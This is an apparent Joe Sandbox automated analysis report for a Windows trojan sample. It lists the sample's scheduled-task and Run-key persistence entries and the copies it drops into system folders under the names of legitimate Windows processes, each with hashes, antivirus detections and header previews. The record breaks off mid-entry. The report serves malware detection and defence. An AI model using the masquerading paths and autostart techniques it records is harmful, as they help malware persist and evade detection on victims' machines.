http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	containerdll.exe, 00000006.00000002.2190779031.0000000002803000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1531316
Start date and time:	2024-10-11 01:26:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5U9CuGu1ru.exe renamed because original name is a hash value
Original Sample Name:	752748b4c26423542f08b2d3bdd47a42.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@42/37@0/0
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Successful, ratio: 64% Number of executed functions: 363 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, f0908023.xsph.ru, pastebin.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PID 2140 because it is empty
Execution Graph export aborted for target WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PID 940 because it is empty
Execution Graph export aborted for target containerdll.exe, PID 748 because it is empty
Execution Graph export aborted for target spoolsv.exe, PID 1292 because it is empty
Execution Graph export aborted for target spoolsv.exe, PID 6416 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 5U9CuGu1ru.exe

Simulations

Behavior and APIs

Time	Type	Description
01:27:09	Task Scheduler	Run new task: spoolsv path: "C:\Users\Public\Desktop\spoolsv.exe"
01:27:09	Task Scheduler	Run new task: spoolsvs path: "C:\Users\Public\Desktop\spoolsv.exe"
01:27:09	Task Scheduler	Run new task: WHqeodkmYpJedFVKZpNEincEtJvAcD path: "C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
01:27:09	Task Scheduler	Run new task: WHqeodkmYpJedFVKZpNEincEtJvAcDW path: "C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
01:27:12	Task Scheduler	Run new task: Memory Compression path: "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
01:27:12	Task Scheduler	Run new task: Memory CompressionM path: "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
01:27:12	Task Scheduler	Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
01:27:12	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
01:27:12	Task Scheduler	Run new task: ShellExperienceHost path: "C:\Recovery\ShellExperienceHost.exe"
01:27:12	Task Scheduler	Run new task: ShellExperienceHostS path: "C:\Recovery\ShellExperienceHost.exe"
01:27:12	Task Scheduler	Run new task: sihost path: "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
01:27:12	Task Scheduler	Run new task: sihosts path: "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
01:27:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcD "C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
01:27:13	Task Scheduler	Run new task: WmiPrvSE path: "C:\Users\Default User\Documents\WmiPrvSE.exe"
01:27:13	Task Scheduler	Run new task: WmiPrvSEW path: "C:\Users\Default User\Documents\WmiPrvSE.exe"
01:27:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Users\Public\Desktop\spoolsv.exe"
01:27:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
01:27:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Recovery\ShellExperienceHost.exe"
01:27:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\Default User\Documents\WmiPrvSE.exe"
01:27:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
01:28:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
01:28:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcD "C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
01:28:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Users\Public\Desktop\spoolsv.exe"
01:28:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
01:28:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Recovery\ShellExperienceHost.exe"
01:28:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\Default User\Documents\WmiPrvSE.exe"
01:28:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
01:28:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows Multimedia Platform\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (335), with no line terminators
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.815931428931858
Encrypted:	false
SSDEEP:	6:4URLUMEcr0+VKnD8tLyW0ZOKeSKeTfAYqISmKfAJWGGUdloeK7tpQUCEWZ/ZcR6y:4AgMpVKgByW0HePeTftuyWRUd47gU03Y
MD5:	2134D8022975DC6004E04DD2CB603556
SHA1:	296518822B50C823D4049FF3BD2FB353E039F98D
SHA-256:	16F119BAE6BEDD3110A28F03FE665AA083B517AB527A733C13DDC1988007815F
SHA-512:	4BC4D12D51A73365FB46FBB816E69E0BF500D0A9CBC7788DBF7A26B1781DF359F64A4B0014635C5BA48507BFD976B2A9724148992E2FA846EC402C1AEA23F8F1
Malicious:	false
Preview:	xum9ZnDAyP79KvFhW1gm13BOPmBavPRQTW9ZyiVVi9BotJ95Ne14PBc4tXuwmmPi8rpxvpsxgKE21XeFnFNQYWAR4Fpbyit5ucpCeLJhvEXF7kCW3oJgZ8KlqX3pAR98bJHZrblc6pfU94UTDTiJZMfvSEVGReheEZnxcnobDqkud0mwCjmqtziPoWHmGeKcIBPjRh1aoHFsluSbcjEr10uP1YJGgBUjfImclCffsMCmuzn3DpKgadkRQAs2Xv3mwgNdIz0ZEi9pyIfBvPC01yJCiUMlUmH7SZ0NmKuOzvc2d5dIeqHIsCv7WK4ynPEbaCWYRRYkeyBFWRi

C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows Portable Devices\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.635128265703238
Encrypted:	false
SSDEEP:	3:DpRJ18z0YsVf/6q4XdtUm826sKpM9D9GHrMA1SU3hfPkuDSnkbzBWCSFMzhGTrU:1dYseXdtf826syMD9AMA1SIhftSnkRWg
MD5:	B9525B6D99BF932609775CBA14983143
SHA1:	63BE3FA285235C8AB79FF57A9021F628EC1B72C7
SHA-256:	8959E935EC5E32897328A1284B38B8DBB3F3400EFDD0B76DBF0621EEFD9CC8A5
SHA-512:	A560D76C00664E964570CA9070FE2A481D1915455C49F66C32EF8D7E293A769DB59BB1ADEA72DDD9C91B7054FAF1C43ADC040010629EDE6AA8D0C0EA36A17586
Malicious:	false
Preview:	ig4sysslxmf4Ap34piP3rukpFyUI0U1fiU8ewWA8Z49Emr5I1Pit2Acx6Pm9XjuduAWqqYHSiRdwvfDX2MRlvInh1LihtAkzJfUmVObcIPLlhpCaLPHKSJsmWyzf0jjiqnnPLaCnuzcf7BALJHVd3ZhAxrPgZ6lipm53CwPvNdZdq

C:\Program Files\Google\Chrome\Application\SetupMetrics\66fc9ff0ee96c2

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (659), with no line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.896588040734431
Encrypted:	false
SSDEEP:	12:dQMZsbSiZGwc2n1J7h5I2syhZLKei4YkxLT/8ZpLIwQRaNotdxY3sQdKrE:drZsbSccMzhmyhweA8nUPCINozi31KrE
MD5:	0D3E0CF63AC9FFCE8FC7AD060519F3B5
SHA1:	9E2A1A922051346C6BA054F69C531E6BDD8CC542
SHA-256:	5AD68E72CD791F8DBFAF39D3E79D29613A8BB6977872956B39B884A967F2D74C
SHA-512:	9A13B4B63D31B0748D40C12E371158973B66B8CF2338BD5BA110691C72EF18B0DED06B6789DBF7E7602A31F9EE48D30C910985205FE2B939BFF3A40409B7C90B
Malicious:	false
Preview:	TKx8gCDOVFz8aZGQ1c7cfFiDBloExoLuSrhDgDqRGQOKb6oqFpRVdaJNlu64Y8ar3Fps2CtxvpWP1YlF779IXzQ1iTcwGw3IzhQVR6yD5dkyE3WMI17b9STEzxJjk7q9wOZUHQxBJ6M4Pcxp7PoPzcIhNMgdwPd8wlB0eBF2E5SDFZyXAemUTbJUF2G5tTO3dNHoa7L5KvL3KFbyXJdSnIpUbrul4JIurYj2SK6DTqKhQQK9aShk06QUiwMtMjAAnaMvfjgNNa868HELgvLmmi3uHPTf7M0uqJ4zDYd1wUXZ7UVasBNbXXYEgboQPAPAjOQzNOHIRUzRKexx32x69ZWSvzSluNlvFW0sEgNe3EJDiG4Co0WWNSBJ27DX5fYEsDLynEtWpTC4QSuo5Q730PiwVq0GcziXqEVe4FYjHAr3PG3jNZcpifOcfZc7Nm3zupNL7Qtz1XvziphPxR3DX3zL028fnbVfG1Jk2rl6qnxKtY402NK6t0c0zCUERNLZBQtqf6WFp6XuFocc8InaRZwQYSu0XhpcbXJdoNU50FQwdsuLk2GIjvImedSNLgsIR4Ssf8xuyrjMI9wqhjQfag2pPh9L5GuUXIejZCqlEVU2L6deqmpmPMrvBnc79lzr7Pz9fNQe2oaFMAdSDef

C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Defender Advanced Threat Protection\1a5d5b8dcee3d8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.461407383826414
Encrypted:	false
SSDEEP:	3:PX925JSXqLhvltbBlv4FJ2NP5lUOpW5kWy9/RDo/EdfMSYVXBL8trn:v92K6LhvlrCz23lXpWy9ZD9dfMXjL8x
MD5:	CF2A6A1428FA836C8997A7A7BB6F56FA
SHA1:	38C2FBD8C5933C2383614CC497404DFE1D8DD581
SHA-256:	0757CC484432742D918F96F8A249D6DE0C9A1325D83987F37BA1926B7F15CD51
SHA-512:	E786E18FA9BC8016229F8BB96FAB6B194800959785ECA5A36801FFEDBD68C9E6413017A9375CA15B1651F0582260CF76645347C5871B0FAC452A867AB024B42D
Malicious:	false
Preview:	GXA29e8Z2uh5Sauskxum2w2d9n3CGSMUsjCNTH53Sk3Od5U47XsTT6QTfh2Vl6SjhNMsYgZc10TR3n9ET9Etk3AwTssvPkSVSTrQtmgb7Pbdn8Z1hxCl2j9oMZYpxnNRi79k5tVrdnvUbhJV

C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Mail\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (864), with no line terminators
Category:	dropped
Size (bytes):	864
Entropy (8bit):	5.911239749630455
Encrypted:	false
SSDEEP:	24:rgzNoK6s1I+c9WyHrQwdAGqNfQrh4IRkj1n:szN5N++RyHEwuYt4OkJ
MD5:	8E462AD31481E53DE1DB1D4A27083462
SHA1:	2CE691224A9E6AC446B85DE4EDAE78BEB654CECE
SHA-256:	35FE24B6FE9A0872F796BC895A7CF26F95969BCC7F3F226D3429B1F130C335E0
SHA-512:	F2CBCDF904677FD3193A85B9116919106874633D416C05AFD33B6602C93D00EDF274D4DA144A8CC7C138B9DFBC4530E57CED868906CD65A6D48161A1AEDD4204
Malicious:	false
Preview:	JFxfC5oC3lEfqAOjXeHifxc4aXaMV6uoSXSbWRKhew31zNkUBzx5dYWVn3Epecr70ZMSrwMGUjEt4lENxGKgJzL4B6ydMeDBF6AZARmPmrl4TmbBy12XRKyBNSQu7t3zgCo7koMfe54cNRkZexoUmpu4I8MsB1R2xvXQ8dbJpW3WQWx6s1QKEjM0StzmcdemoBob3TaAWfpQvXnvKPAJlGxOjh8OoyqL2QsPrVDYbPyj36E4GDbNdUBhOa2VVLWhydXfpXEyMlsWRNUncDIkWdshPKBQdrDP2RvaijOs9mB1lpQAGO3RDwKVvzPfWxVfiddAc4F3zZkub06k3AKOywMFGZpsTtVLRgTILQiLJ9bnMa343pmWnGqvQY3CPXjGDZc5hyZnc8FyUi3qguyoG9hLzh1wXf6vZVjw87WFQ94oA2breMfei59D1RGA6mP6CTY98HsjYtYHF3K6GJSLAcNeWf5r0WIot7mqdcsXd6Fzh188GK3xTE6jG4mdLBsCltYHQdcoa4rDWX6eh6kqcUUpBCkjzPLcODOxd0rmrPWZX2Ns7I5PaBjQZtFO33zKsOyTJJBqP79M85RJz1lrU6BMd7YuvdtxaLqID4jyGP9dCXReb6YCSH0wNmzLuR5vOLwwPJF4RwkF6iJGp4SyErfSU34bEXDyTOO0kePR1dufhvzpctf08GqhqdcVOo04tvvsTSfLoB7k69viEP8V1M0NhrKHC4CNnzwvAGVKOUL7JGkqs3Q9peCg5hLmIXIu8u7GN9i73yHgA2EbGdYJnChIwP0d5sB0Mb8ZIddtUTF1XgfCdtgp98H5MyU8JFBKwQUj4pSmApyU7qvQtx9LMW0NTCMUJejP

C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows NT\TableTextService\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (784), with no line terminators
Category:	dropped
Size (bytes):	784
Entropy (8bit):	5.901460550399461
Encrypted:	false
SSDEEP:	24:C3U1XM6jkGHLsKVT5nArVS6nx2XLz2Yxs0yjrwaD2f:9XVFAGnABP+LCYxsF8f
MD5:	B112AEC8C8927B52950F0C3ED6AE81CB
SHA1:	DF381E4E5019F8CE59D51D1DCA3F2C557C5BC9AB
SHA-256:	0409BCACB0C97DE97377D6E6CC4D883DE862049C687E6063B7AFA3DDCA4836DA
SHA-512:	5747C8D06E17E72ED267C164EC91A9380DF5DA7C23FB8120A52603749B19E99E939B73DE3C6BC350EE901E366C493E9C336D311F3AFEBBF3CBAB59BD46CB1E0F
Malicious:	false
Preview:	kslcfm46Hd8cVLtkwmjBJK4eFgRzKoiwqd4KD7jjFgLjfD7PYdXzKgnZxGW9VEwc5Mv1QihyC95m9U9CjBaqRtmK0eW6ljOBusoTRF906jwKlAadHUZTnGLLjlBvLlNcu42QqpueCkur7bi0E3yQK4XnhctqENoUWTarIKxcj5RDWdOICKrSx6S0gOtN5Eay6ZVnB1s3FVrOmURDOln3fVgaAkK3akgffcG6IkHKcxMbOENM6q8UbgSl25marydfzMsKNV5ndcasIFL6X76ulLE8JeDM7qdnUrmCVC9luV18FkcxuqDu2s4nItAsRspx9wYbdIkU7V9PUF2jCQcRmsvlw84lCQTBpD9TMBUmFtwhtoSC0bqBQYKQBwpeN8RrB7jRGjWA50L26O2Hp2uljSvR2sRZWzYGbEfvEB6QEpFaMSUw4hyVOqItMSYXS6oGbEa1sGCo5eg3MUEkXffyBC2v6wiwni8IB98I1dExeKZuKOg2NxAxb0EZLp45iPBXfY2MV6t4brT1mIlsQqjziLrK5j6LjIPOICOvVUgQEFWtgNwCELp2qLzTrrRwAiVScFsk4zW5JSvcz7orw3HXcXi7M5EoDuQguDRaeMIOytsXaXdtCj9Ga80EgvY8vs2YCPswqNMju2isoLgzbUlduKFwNM4tyJcG1UULorDyWaViZHZVOihbHZn2K6jeTdvlac1U0VKtRwHUyhWGwjePmB8bqcBsIif3ouI7PFe3YxJVRTDmjdst8f8YdZoXTblsQNpEZZ0qEl0y1nJX

C:\Recovery\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (539), with no line terminators
Category:	dropped
Size (bytes):	539
Entropy (8bit):	5.873344604653604
Encrypted:	false
SSDEEP:	12:J2og0q0MCgbXuZx+xWiXclbNetdmctzByGap+Tb+s025BodIvqk8BTn0hab:pRq0MCgzGYx7AQtdmctzCp+62PodSqgC
MD5:	08D63E3185E8697E7359CF662182023A
SHA1:	87669D236307AF98492A8F76D1EBEF03067088DC
SHA-256:	DF729AA34141539809E604655F9F858C584E22E7877AAC9574698A17DAF046E8
SHA-512:	989AC76C452EDD0BBB810535957DD031FFE5E3E44C82750A5C9AAD2A91E67570FC9959B66255A445CEFDE14697765533AE2B8C8170778C7D2DA4281B252D9728
Malicious:	false
Preview:	nfzqoXB3UGs3lhkWFdmhjU1htGnspVmSt1Gd26mrzTbgCqLlD4vCCf7ToR7huSO8eaKubHdJ04rQ2VfD5BpvkjPN3xzk9F7hFdClfbK6amMIyrbSw4msndY4L70oR3Ku6KLYS3hd0tV7XHYMWgxEdP4lFIailgogcbLogCA3WI23HagDioSvGFRrPjSKc82UFyf66upTg3sUWAeplX96O2aWJdY7u0bXPhxT4jHy88PMX6UPFniF95FNYIxcVsipcUFzMKuBPK7PnO9NIJ2HRVYUck5wwodQZjtC1fC42gzy7zkJIkUL0bYH6vWlP7OkrrzDf7VmH7OufjWmAvoMTRa8LlGGJao4SPGQAgoKOsD2NnlWZukeTBRZR1131PdqSUcQdFmeGd8lOhvi9trYzKkQ7r9IouT9OXj2KV3TIGX0DpLtGT3HiF1ItMSvGdzWJ9W082Xo0YPsxtNSfPBU0MbJfbJ8CHMoRBrESUuO6PQJzIU999Q0bef7iNVhsYltLkbwCJALfxYl5RUXGK9C1VMwfuf

C:\Recovery\RuntimeBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\ShellExperienceHost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
